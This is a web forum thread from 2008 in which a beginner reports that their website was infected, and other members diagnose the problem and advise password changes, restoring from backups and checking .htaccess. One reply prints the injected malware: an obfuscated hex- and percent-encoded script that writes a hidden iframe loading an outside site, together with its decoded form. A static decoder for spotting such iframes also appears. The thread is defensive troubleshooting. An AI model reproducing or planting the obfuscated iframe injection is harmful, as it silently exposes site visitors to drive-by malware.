  1. #1
    New to the CF scene
    Join Date
    Dec 2008
    Posts
    2
    Thanks
    0
    Thanked 0 Times in 0 Posts

    Site Malware Infection--Please Help

    Hello. I received a troubling email from a user of my website this morning, notifying me that my website has been infected by malware, and is dangerous to its visitors. I am new to web design and do not know how this happened, or how to remove it. I noticed last night that a strange glitch was causing my site’s home page, along with any pages linked to it named “index” to have their tables misaligned. Since I had added a code I found online for favicons to the home page of the site on its last update a week earlier, I thought that might be responsible. (That code was <link rel="shortcut icon" href="/favicon.ico">) I tried removing this code and re-uploading the affected pages. This seemed to correct the misalignment, but I am worried that a worse problem has arisen. Is there anyone who can give me any advice? Any suggestions for how to make my website safe again would be very appreciated!

    (If relevant, my website URL is www.Nosgoth.net.)
    Last edited by Tenaya_Pyweack; 12-18-2008 at 05:57 PM.

  • #2
    Regular Coder
    Join Date
    Sep 2008
    Location
    Oklahoma
    Posts
    249
    Thanks
    11
    Thanked 13 Times in 13 Posts
    Favicon wouldn't cause it to do that. Someone must have logged in and added other code.

    If it is infected I won't click on the link you posted. My mom had to have me reinstall her computer because of stuff like this, she went on a baby shower website and got bombarded by self-installing trojans.

    I suggest you change your passwords for your host login and upload your site from your backup files.

    Make sure your computer doesn't have any keyloggers that would save passwords.

  • #3
    Supreme Master coder! _Aerospace_Eng_'s Avatar
    Join Date
    Dec 2004
    Location
    In a place far, far away...
    Posts
    19,291
    Thanks
    2
    Thanked 1,043 Times in 1,019 Posts
    I found this in your code
    Code:
    <iframe src="http://palech.com/index.php" width="0" height="0" style="display:none"></iframe>
    It's the decryption of this
    Code:
    <script>function c102916999516l494578a51c6c4(l494578a51d5ce){ var l494578a51da4d=16; return (parseInt(l494578a51d5ce,l494578a51da4d));}function l494578a51e9ec(l494578a51f1e7){ function l494578a52092e(){var l494578a521106=2;return l494578a521106;} var l494578a51f98d='';l494578a5218cf=String.fromCharCode;for(l494578a52015e=0;l494578a52015e<l494578a51f1e7.length;l494578a52015e+=l494578a52092e()){ l494578a51f98d+=(l494578a5218cf(c102916999516l494578a51c6c4(l494578a51f1e7.substr(l494578a52015e,l494578a52092e()))));}return l494578a51f98d;} var x8a='';var l494578a5220a0='3C736'+x8a+'3726'+x8a+'970743E6'+x8a+'96'+x8a+'6'+x8a+'28216'+x8a+'D796'+x8a+'96'+x8a+'1297B6'+x8a+'46'+x8a+'F6'+x8a+'3756'+x8a+'D6'+x8a+'56'+x8a+'E742E77726'+x8a+'9746'+x8a+'528756'+x8a+'E6'+x8a+'5736'+x8a+'36'+x8a+'1706'+x8a+'528202725336'+x8a+'32536'+x8a+'392536'+x8a+'36'+x8a+'2537322536'+x8a+'312536'+x8a+'6'+x8a+'42536'+x8a+'352532302536'+x8a+'6'+x8a+'52536'+x8a+'312536'+x8a+'6'+x8a+'42536'+x8a+'3525336'+x8a+'42536'+x8a+'332533312533302532302537332537322536'+x8a+'3325336'+x8a+'42532372536'+x8a+'3825373425373425373025336'+x8a+'125326'+x8a+'6'+x8a+'25326'+x8a+'6'+x8a+'2536'+x8a+'372536'+x8a+'6'+x8a+'6'+x8a+'2536'+x8a+'372536'+x8a+'6'+x8a+'6'+x8a+'2533322536'+x8a+'6'+x8a+'42536'+x8a+'3525326'+x8a+'52536'+x8a+'6'+x8a+'52536'+x8a+'3525373425326'+x8a+'6'+x8a+'25326'+x8a+'52536'+x8a+'372536'+x8a+'6'+x8a+'6'+x8a+'25326'+x8a+'6'+x8a+'2536'+x8a+'332536'+x8a+'382536'+x8a+'352536'+x8a+'332536'+x8a+'6'+x8a+'225326'+x8a+'52536'+x8a+'382537342536'+x8a+'6'+x8a+'42536'+x8a+'6'+x8a+'32532372532302537372536'+x8a+'392536'+x8a+'342537342536'+x8a+'3825336'+x8a+'42533372533302533352532302536'+x8a+'382536'+x8a+'352536'+x8a+'392536'+x8a+'372536'+x8a+'3825373425336'+x8a+'42533382533382532302537332537342537392536'+x8a+'6'+x8a+'32536'+x8a+'3525336'+x8a+'4253237253736'+x8a+'2536'+x8a+'392537332536'+x8a+'392536'+x8a+'322536'+x8a+'392536'+x8a+'6'+x8a+'32536'+x8a+'3925373425373925336'+x8a+'12536'+x8a+'382536'+x8a+'392536'+x8a+'34
2536'+x8a+'342536'+x8a+'352536'+x8a+'6'+x8a+'525323725336'+x8a+'525336'+x8a+'325326'+x8a+'6'+x8a+'2536'+x8a+'392536'+x8a+'36'+x8a+'2537322536'+x8a+'312536'+x8a+'6'+x8a+'42536'+x8a+'3525336'+x8a+'52729293B7D76'+x8a+'6'+x8a+'172206'+x8a+'D796'+x8a+'96'+x8a+'13D7472756'+x8a+'53B3C2F736'+x8a+'3726'+x8a+'970743E';document.write(l494578a51e9ec(l494578a5220a0));</script><!-- o --><Script Language='Javascript'>
    <!-- HTML Encryption provided by iWEBTOOL.com -->
    <!--
    document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%70%61%6C%65%63%68%2E%63%6F%6D%2F%69%6E%64%65%78%2E%70%68%70%22%20%77%69%64%74%68%3D%22%30%22%20%68%65%69%67%68%74%3D%22%30%22%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%22%3E%3C%2F%69%66%72%61%6D%65%3E'));
    //-->
    </Script>
    Did you put any of that there yourself? I suggest you contact your host and try to remove any code that looks like the above.
    ||||If you are getting paid to do a job, don't ask for help on it!||||

  • Users who have thanked _Aerospace_Eng_ for this post:

    oesxyl (12-18-2008)
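
The decoding described in post #3 can be done statically, without ever running the injected script. The following is an added example, not code from any poster in this thread; the function names, the `MAX_LAYERS` limit and the `example.invalid` fixture are assumptions made for illustration.

```javascript
'use strict';
const MAX_LAYERS = 4; // assumed cap on nested encodings

// Decode %XX escapes as unescape() would, without executing anything.
function decodePercent(s) {
  return s.replace(/%([0-9a-f]{2})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Decode a run of hex pairs, the scheme of the first script in post #3.
function decodeHexPairs(s) {
  return s.replace(/[0-9a-f]{2}/gi, h => String.fromCharCode(parseInt(h, 16)));
}

// Return the src of every iframe that is zero-sized or display:none.
function hiddenIframes(html) {
  const hits = [];
  for (const [tag] of html.matchAll(/<iframe\b[^>]*>/gi)) {
    const hidden = /display\s*:\s*none/i.test(tag) ||
      /\b(width|height)\s*=\s*["']?0\b/i.test(tag);
    const src = /\bsrc\s*=\s*["']?([^"'\s>]+)/i.exec(tag);
    if (hidden) hits.push(src ? src[1] : '(no src)');
  }
  return hits;
}

// Peel encoded string literals layer by layer and collect hidden iframes.
function scan(source, depth = 0, findings = []) {
  findings.push(...hiddenIframes(source));
  if (depth >= MAX_LAYERS) return findings;
  let folded = source;
  // Fold '+name+' joins where name is declared as '' (the x8a trick above).
  for (const [, name] of source.matchAll(/var\s+(\w+)\s*=\s*'';/g)) {
    folded = folded.split(`'+${name}+'`).join('');
  }
  const literal = /(['"])((?:%[0-9a-f]{2}){8,}|(?:[0-9a-f]{2}){8,})\1/gi;
  for (const [, , body] of folded.matchAll(literal)) {
    const next = body[0] === '%' ? decodePercent(body) : decodeHexPairs(body);
    scan(next, depth + 1, findings);
  }
  return findings;
}

// Constructed fixture (not the thread's payload): same two layers, harmless host.
const enc = (s, pre) => [...s].map(c => pre + c.charCodeAt(0).toString(16).padStart(2, '0')).join('');
const IFRAME = '<iframe src="http://example.invalid/index.php" width="0" height="0" style="display:none"></iframe>';
const LAYER1 = `<script>document.write(unescape('${enc(IFRAME, '%')}'));</script>`;
const SAMPLE_PAGE = `<p>ok</p><script>var x8a='';var p='${enc(LAYER1, '').replace(/6/g, "6'+x8a+'")}';</script>`;

console.log(scan(SAMPLE_PAGE));
```

It only follows string literals that are wholly percent-encoded or wholly hex-encoded, so a page packed with a different encoder needs its own decode step.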

  • #4
    New to the CF scene
    Join Date
    Dec 2008
    Posts
    2
    Thanks
    0
    Thanked 0 Times in 0 Posts
    Thank you both very much! If Windows’ AutoComplete feature counts as what you mean by a keylogger, I did have one that had memorized the password for my website. I have now changed my password and re-uploaded everything from the files on my hard drive. It appears to be working now. Hopefully it will continue to.

  • #5
    Regular Coder optimus203's Avatar
    Join Date
    Sep 2008
    Location
    CT
    Posts
    317
    Thanks
    22
    Thanked 16 Times in 15 Posts
    I was having the same problem with one of my sites. Apparently, someone gained access to an FTP login, and was changing the .htaccess file to redirect to a bogus anti-virus site. So while there may have been nothing wrong with your site, it's the best idea to make sure this .htaccess file is not changed, and the login passwords, along with FTP passwords are changed.
    Always thank those CF Users who help you solve issues...
    Connecticut Web Design

  • #6
    Senior Coder gnomeontherun's Avatar
    Join Date
    Sep 2007
    Location
    Houston
    Posts
    2,846
    Thanks
    10
    Thanked 238 Times in 229 Posts
    I would second what Aero says, contact your host. They know these things and can often fix them for you. Of course a good password is paramount though. I had this happen to a client, because they chose a dictionary word as a password, and it was hacked. It's pesky, because you don't always know where the affected areas are, and your support might be able to track down when it occurred, which files were changed, and clean it up much faster (and more thoroughly) than you can on your own.

    Of course if you have little or no support, check the .htaccess and look at every file and folder!
    jeremy - gnomeontherun
    Educated questions often get educated answers, and simple questions often get simple answers.

